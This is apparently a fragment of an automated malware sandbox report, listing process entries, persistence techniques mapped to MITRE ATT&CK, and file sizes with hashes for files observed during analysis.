PID:4476
-
C:\Windows\system32\sihost.exesihost.exe1⤵PID:2936
-
C:\Windows\system32\sihost.exesihost.exe1⤵PID:1560
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD533943ddf7ab410f98e2bff392ed62441
SHA1f27016ff8b33cb2b8df39364d0ae2bf8a2c00e52
SHA256186b4f81ac762e8bda66248fd38ce38190d108b5c430293f64c1dcef5ff32b65
SHA512918d18568c816149d1dd848e1a5bfba9f3e84c9e4e23d4e4982c05cf9366ceac265ba82333aa2a917d2374fd6eb62877f28a92b226baee03918d8608af2d7ede
-
Filesize
17KB
MD55efb49cec0db02811b5a377cd2518d69
SHA1d2d8deebaa583fae9f6be1267c1062ce385aab86
SHA2566dafee793a1899a409a908ab669a4075d8d58d0870dfc1d02db47b822b74a1b9
SHA5128a4e89709cd338411e025a558ce9eb02efd1936152209ea8d934214ccaae5eff112e42759b6d696e5d62d4951b1f872470541835149d51c3a43a4b7d14279c14
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
98KB
MD5d505d50ab745d07a7c9cba97717febe4
SHA1528d34e656da344a33a5e3fe27ac43ad5f7dfd0a
SHA25687fad0da502598adcb3da26c2a260cefcec7f383d73b62f94d7c8175812c0fad
SHA51228a8975b6133c366cdcde075acbec07ce7be6fa7a98387dabe5d5c5024368ac9663705d668b1c48f4da6ae8b0f6b95798ac1e4abada6a5a885d431467c8febf1
-
Filesize
2.8MB
MD587f351e454deded1b279aef5a5d632e9
SHA1a936b08d94983f58a31f1207d73fd640fcbabd1a
SHA2565543ea3c67eb8e9bb763a54e80a042dfa7b297d62610e7fe057d0fc7be49212c
SHA5123c40874adc3ea30d147b68ba74aadb0b0228a822137dd0db04daa611a6ecc8ee8e0bfc49fb7242dee60bc2fa6860575f4061c7ff8aa9e4105550c710316f2b8f
-
Filesize
355KB
MD5091267b13791fb80a21044c473e74298
SHA17a4240532744ccb36fbd15f179dd0799b73de881
SHA2567ff6d4737f39fefefa9fc6d1f3dc31fcc968d0d45bb09a364457a0af51af860f
SHA512e69a6d7309bd73a365f088918c7cae13a8b0925f5b395e38c9cd51509d5b451694a660143f5be4d24624b51f4a4a6a1c2c0fac0a650a539386a81e4eaa7e71c2